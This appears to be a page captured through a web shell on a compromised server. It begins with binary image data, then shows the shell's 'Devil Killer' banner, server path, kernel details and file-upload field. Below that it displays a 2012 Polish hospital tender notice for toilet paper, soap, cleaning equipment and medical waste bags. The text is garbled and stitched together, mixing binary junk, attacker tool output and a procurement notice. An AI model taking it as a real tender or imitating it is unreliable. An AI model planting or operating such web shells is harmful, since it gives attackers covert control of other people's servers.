JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120131/25683-N-2012.html

<p class="kh_header"><b>Kraków: DOSTAWY ŚRODKÓW HIGIENICZNYCH, MYJĄCYCH ORAZ DROBNEGO SPRZĘTU DO UTRZMANIA HIGIENY</b><br>
<b>Numer ogłoszenia: 25683 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY ŚRODKÓW HIGIENICZNYCH, MYJĄCYCH ORAZ DROBNEGO SPRZĘTU DO UTRZMANIA HIGIENY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.	Szczegółowa nazwa przedmiotu zamówienia ( charakterystyka, wymiary itp)	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość
netto w PLN	VAT w PLN	Wartość
brutto w PLN	Nazwa handlowa/ 
numer katalogowy
1	Papier toaletowy w mini jumbo roli, szary, jednowarstwowy, makulatura, dł min 240 m, wymiary listka 10 x 14 cm, gramatura 26,5g/m, średnica  rolki 18,5 cm.	33761000-2	rolka	500						
2	 Ręcznik w składce ZZ, biały, makulaturowy.Wymiary odcinka 25x23cm.Ilość odcinków w opakowaniu 200. Karton - 20 op.	33763000-6	op	6000						
3	 Ręcznik w roli biały bez gilzy, celuloza, 2 warstwy, gramatura 2x20 g/m, długość min. 62 m,  śr. rolki min. 13,5 cm, wysokość rolki 19 cm.Opakowanie  12 rolek.	33763000-6	rolka	11000						
4	Ręcznik biały, 2 warstwowy, wykonany w technologii hybrid, pasujący do dozownika z gilotynowym systemem dozowania ręcznika. Długość minimum 150 metrów. Szerokość rolki 21 cm, średnica 19 cm,  Opakowania po 6 sztuk.	33763000-6	rolka	1200						
5	Papier toaletowy, dwuwarstwowy, makulatura, kolor biały. Gramatura 2x17,8g/m. Średnica rolki 12,5 cm, wym 9,7cm x 49,6 cm. Ilość rolek w opakowaniu zbiorczym: 30 rolek. 	33761000-2	rolka	6000						
6	Prześcieradło papierowe, celuloza,kolor biały, dwuwarstwowe o wymiarach; szerokośc rolki 60 cm, długość 79,9 m.Średnica rolki 14,5 cm.	33772000-2	rolka	240						
7	Worek papierowy, trzywarstwowy,o wymiarach 1100mmx700mm, dno przeszywane, u góry worka sznurek umożliwiający ściągnięcie( zamknięcie) worka po wypełnieniu.	33772000-2	szt	800,00						
 	RAZEM	 	 	 						
	 									
PAKIET I ŚRODKI HIGIENICZNE 

	
 

	PAKIET II MYDŁO W PŁYNIE I KREM									



Lp	Nazwa towaru 	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w złotych	VAT w PLN	Wartość brutto w złotych	
Nazwa katalogowa / numer handlowy

1.
	Mydło w płynie do rąk, zawierające witaminę A+E, oraz glicerynę o zapachu fresh.Ph-6.Skład - 5% amfoteryczne środki powierzchniowo czynne, 5-15% anionowe środki powierzchniowo czynne,
substancja konserwująca (Methylchloroisothiazolinone, Methylisothiazolinone). Opakowanie; kanister 5l.	33711900-6	kanister	180						

2.	Krem nawilżający do rąk z woskiem pszczelim. Opakowanie;tuba stojąca na zakrętce o pojemności 100 ml.	33742000-3	tuba	150						

3.	Kostka WC z koszyczkiem o zapachu morskim	24954200-8	szt	500						
	RAZEM	 	 	 						

 

PAKIET III ŚRODKI I SPRZĘT DO KUCHNI								
Lp	Nazwa towaru 	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w złotych	VAT w PLN	Wartość brutto w złotych	
Nazwa katalogowa/ numer handlowy
1	Kwaśny płyn do odkamieniania urządzeń w gastronomii ( kotły, wyparzarki, zmywarki itp)Pojemnośc 5l. Opakowanie kanister.	39831210-1	kanister	4						
2	Płyn nabłyszczający do płukania naczyń w zmywarko- wyparzarkach  wyposażonych w urządzenie dozujące.Pojemność10l. Opakowanie kanister.	39831210-1	kanister	2						
3	 Uniwersalny płyn do ręcznego mycia naczyń. Pojemnośc 5l. Opakowanie kanister.	39832000-3	kanister	200						
4	Sól  do zmywarek typu Calgonit.  Opakowanie 1,5 kg	39831210-1	opakowanie	60						
5	Druciak spiralny ze stali nierdzewnej	 	szt	500						
6	Szczotka twarda do blatów HACCAP. Wykonana z poliestru. Przystosowana do wyparzania. Biała -2 szt,czerwona 2 szt,żółta 1szt zielona 2szt, niebieska 1szt	39224200-0	szt	8						
7	Szczotka do mycia podłogi HACCAP. Wykonana z poliestru. czerwona 2szt, niebieska 2szt, zielona 2szt	39224200-0	szt	6						
8	Szczotka miekka do stali nierdzewnej HACCAP. Wykonana z poliestru.  Kolor czerwony.	39224200-2	szt	14						
 	RAZEM	 	 							

 

PAKIET IV DROBNY SPRZĘT DO UTRZYMANIA HIGIENY							
Lp	Nazwa towaru 	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w złotych	VAT w PLN	Wartość brutto w złotych	
Nazwa katalogowa / numer handlowy
1	 Kosz na śmieci Curver z pedałem 25 l. Kolor niebieski lux. Wymiary 360x360 x410mm	39224340-3	szt	22						
2	Wolnostojąca szczotka WC wykonana z polipropylenu, koloru niebieskiego	39224310-4	szt	100						
3	Miotła/ szczotka do zamiatania o szerokości 40 cm z drązkiem.	39224100-9	szt	15						
4	Zestaw zmiotka z szufelką- kolor niebieski	39812400-1	szt	50						
5	Miotła typu SORGO	39224100-9	szt	10						
 	RAZEM	 	 	 						





	
 

PAKIET V WORKI FOLIOWE 									
Lp	Nazwa towaru 	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w złotych	VAT w PLN	Wartość brutto w złotych	Nazwa katalogowa / numer handlowy
1	Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, ,nieprzezroczyste czerwone. Grubość - 0,07 mm, wym.600mm x1200mm. 1 rolka 25 szt. Zgrzewka -10 rolek.	18930000-7	rolka	1000						
2	    Worki jednorazowego użycia  na odpady medyczne z folii polietylenowej, nieprzezroczyste, czerwone, grubość 0,05 mm, wym. 500mm x 600 mm . 1 rolka 25 szt. Zgrzewka -20 rolek	18930000-7	rolka	960						
3	  Worki jednorazowego użycia  na odpady medyczne z folii polietylenowej, nieprzezroczyste, niebieskie. Grubość 0,05 mm, wym. 500mm x 600 mm . 1 rolka - 25 szt. Zgrzewka -20 rolek	18930000-7	rolka	1500						
4	 Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, nieprzezroczyste niebieskie.Grubość; 0,07mm,wym.600mm x 1200mm. 1 rolka -25 szt. Zgrzewka 10 rolek.	18930000-7	rolka	1100						
 	RAZEM.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.76.30.00-6, 33.71.19.00-6, 33.74.20.00-3, 39.83.12.10-1, 39.22.42.00-2, 39.22.41.00-9, 18.93.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	  	Wypełniony  FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2)	  	Wypełniony we wskazanych miejscach FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA według ZAŁĄCZNIKANR 1 do SIWZ.
3)	  	Pełnomocnictwo do podpisania oferty w toczącym się postępowaniu (pełnomocnictwo do zaciągania zobowiązań w imieniu Wykonawcy), dołączone do oferty, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę. 
4)	 	 Oświadczenie Wykonawcy, w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ.
5)	  	Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, jeżeli odrębne przepisy wymagają wpisu do rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6)		Karty charakterystyki:
a. dla Pakietu I - potwierdzone przez producenta, z danymi technicznymi asortymentu dla poz. 1,2,3,4,5,6;
b. dla Pakietu II -potwierdzone przez producenta dla poz. 1;
c. dla Pakietu III - z danymi technicznymi asortymentu dla wszystkich pozycji;
d. dla Pakietu IV - dla asortymentu z pozycji 1,2;
e. dla Pakietu V - potwierdzone przez producenta z danymi technicznymi asortymentu.  
7)		Dokument potwierdzający dopuszczenie używania środków przez PZH dla asortymentu z pakietu III, poz. 1,2,3.
8)		Próbki dla asortymentu z pakietu V, po jednej rolce dla każdej pozycji, celem wykazania iż oferowane przedmioty spełniają wymagania określone przez Zamawiającego(zgodnie z załącznikiem nr 4).
9)		Wykaz próbek według formularza stanowiącego ZAŁĄCZNIK NR 4 do SIWZ. 
10)	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 5 składa odpowiedni dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
 a ) nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej 
     niż 6 miesięcy przed upływem terminu składania ofert.
11)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 10, zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - w zakresie dat wystawienia dokumentów, przepisy punktu 10 stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący dopuszcza zmiany treści niniejszej umowy wyłącznie w zakresie przewidzianym w § 3 ust. 7, 9-10 i § 9 ust. 1 wzoru umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://5wszk.com.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką - Samodzielny Publiczny Zakład Opieki Zdrowotnej 30 - 901 Kraków, ul. Wrocławska 1-3..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2012 godzina 11:00, miejsce: Kancelaria Szpitala, (budynek komendy), ul. Wrocławska 1-3, 30 - 901 Kraków...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ŚRODKI HIGIENICZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Szczegółowa nazwa przedmiotu zamówienia ( charakterystyka, wymiary itp..)	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość
netto w PLN	VAT w PLN	Wartość
brutto w PLN	Nazwa handlowa/ 
numer katalogowy
1	Papier toaletowy w mini jumbo roli, szary, jednowarstwowy, makulatura, dł min 240 m, wymiary listka 10 x 14 cm, gramatura 26,5g/m, średnica  rolki 18,5 cm.	33761000-2	rolka	500						
2	 Ręcznik w składce ZZ, biały, makulaturowy.Wymiary odcinka 25x23cm.Ilość odcinków w opakowaniu 200. Karton - 20 op.	33763000-6	op	6000						
3	 Ręcznik w roli biały bez gilzy, celuloza, 2 warstwy, gramatura 2x20 g/m, długość min. 62 m,  śr. rolki min. 13,5 cm, wysokość rolki 19 cm.Opakowanie  12 rolek.	33763000-6	rolka	11000						
4	Ręcznik biały, 2 warstwowy, wykonany w technologii hybrid, pasujący do dozownika z gilotynowym systemem dozowania ręcznika. Długość minimum 150 metrów. Szerokość rolki 21 cm, średnica 19 cm,  Opakowania po 6 sztuk.	33763000-6	rolka	1200						
5	Papier toaletowy, dwuwarstwowy, makulatura, kolor biały. Gramatura 2x17,8g/m. Średnica rolki 12,5 cm, wym 9,7cm x 49,6 cm. Ilość rolek w opakowaniu zbiorczym: 30 rolek. 	33761000-2	rolka	6000						
6	Prześcieradło papierowe, celuloza,kolor biały, dwuwarstwowe o wymiarach; szerokośc rolki 60 cm, długość 79,9 m.Średnica rolki 14,5 cm.	33772000-2	rolka	240						
7	Worek papierowy, trzywarstwowy,o wymiarach 1100mmx700mm, dno przeszywane, u góry worka sznurek umożliwiający ściągnięcie( zamknięcie) worka po wypełnieniu.	33772000-2	szt	800,00						
 	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.77.20.00-2, 33.76.30.00-6, 33.76.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MYDŁO W PŁYNIE I KREM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa towaru 	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w złotych	VAT w PLN	Wartość brutto w złotych	
Nazwa katalogowa / numer handlowy

1.
	Mydło w płynie do rąk, zawierające witaminę A+E, oraz glicerynę o zapachu fresh.Ph-6.Skład; <5% amfoteryczne środki powierzchniowo czynne, 5-15% anionowe środki powierzchniowo czynne,
substancja konserwująca (Methylchloroisothiazolinone, Methylisothiazolinone). Opakowanie; kanister 5l.	33711900-6	kanister	180						

2.	Krem nawilżający do rąk z woskiem pszczelim. Opakowanie;tuba stojąca na zakrętce o pojemności 100 ml.	33742000-3	tuba	150						

3.	Kostka WC z koszyczkiem o zapachu morskim	24954200-8	szt	500						
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.71.19.00-6, 33.74.20.00-3, 24.95.42.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ŚRODKI I SPRZĘT DO KUCHNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa towaru 	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w złotych	VAT w PLN	Wartość brutto w złotych	
Nazwa katalogowa/ numer handlowy
1	Kwaśny płyn do odkamieniania urządzeń w gastronomii ( kotły, wyparzarki, zmywarki itp)Pojemnośc 5l. Opakowanie kanister.	39831210-1	kanister	4						
2	Płyn nabłyszczający do płukania naczyń w zmywarko- wyparzarkach  wyposażonych w urządzenie dozujące.Pojemność10l. Opakowanie kanister.	39831210-1	kanister	2						
3	 Uniwersalny płyn do ręcznego mycia naczyń. Pojemnośc 5l. Opakowanie kanister.	39832000-3	kanister	200						
4	Sól  do zmywarek typu Calgonit.  Opakowanie 1,5 kg	39831210-1	opakowanie	60						
5	Druciak spiralny ze stali nierdzewnej	 	szt	500						
6	Szczotka twarda do blatów HACCAP. Wykonana z poliestru. Przystosowana do wyparzania. Biała -2 szt,czerwona 2 szt,żółta 1szt zielona 2szt, niebieska 1szt	39224200-0	szt	8						
7	Szczotka do mycia podłogi HACCAP. Wykonana z poliestru. czerwona 2szt, niebieska 2szt, zielona 2szt	39224200-0	szt	6						
8	Szczotka miekka do stali nierdzewnej HACCAP. Wykonana z poliestru.  Kolor czerwony.	39224200-2	szt	14						
 	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.10-1, 39.83.20.00-3, 39.83.12.10-1, 39.22.42.00-0, 39.22.42.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> DROBNY SPRZĘT DO UTRZYMANIA HIGIENY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DROBNY SPRZĘT DO UTRZYMANIA HIGIENY.</p></li>
